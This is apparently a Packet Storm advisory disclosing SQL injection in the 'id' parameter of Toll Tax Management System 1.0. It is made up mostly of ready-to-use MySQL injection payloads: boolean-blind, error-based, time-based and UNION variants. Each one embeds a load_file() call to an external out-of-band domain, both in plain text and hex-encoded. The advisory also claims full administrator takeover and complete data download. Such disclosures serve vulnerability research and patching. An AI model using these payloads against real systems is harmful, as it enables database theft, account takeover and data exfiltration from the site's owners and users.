Lucene search

K
packetstormNu11secur1tyPACKETSTORM:166908
HistoryMay 02, 2022 - 12:00 a.m.

Toll Tax Management System 1.0 SQL Injection

2022-05-0200:00:00
nu11secur1ty
packetstormsecurity.com
153
`## Title: Toll Tax Management System v1.0 SQLi  
## Author: nu11secur1ty  
## Date: 04.07.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System  
  
## Description:  
The `id` parameter appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'  
was submitted in the id parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker can take administrator account control and also of all  
accounts on this system, also the malicious user can download all  
information about this system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY  
or GROUP BY clause  
Payload: id=1'+(select  
load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''  
RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(select  
load_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+''  
ELSE 0x28 END)) AND 'XhmU'='XhmU  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: id=1'+(select  
load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''  
OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT  
(ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1'+(select  
load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''  
AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 6 columns  
Payload: id=1'+(select  
load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''  
UNION ALL SELECT  
CONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System)  
  
## Proof and Exploit:  
[href](https://streamable.com/y9xo4q)  
  
  
`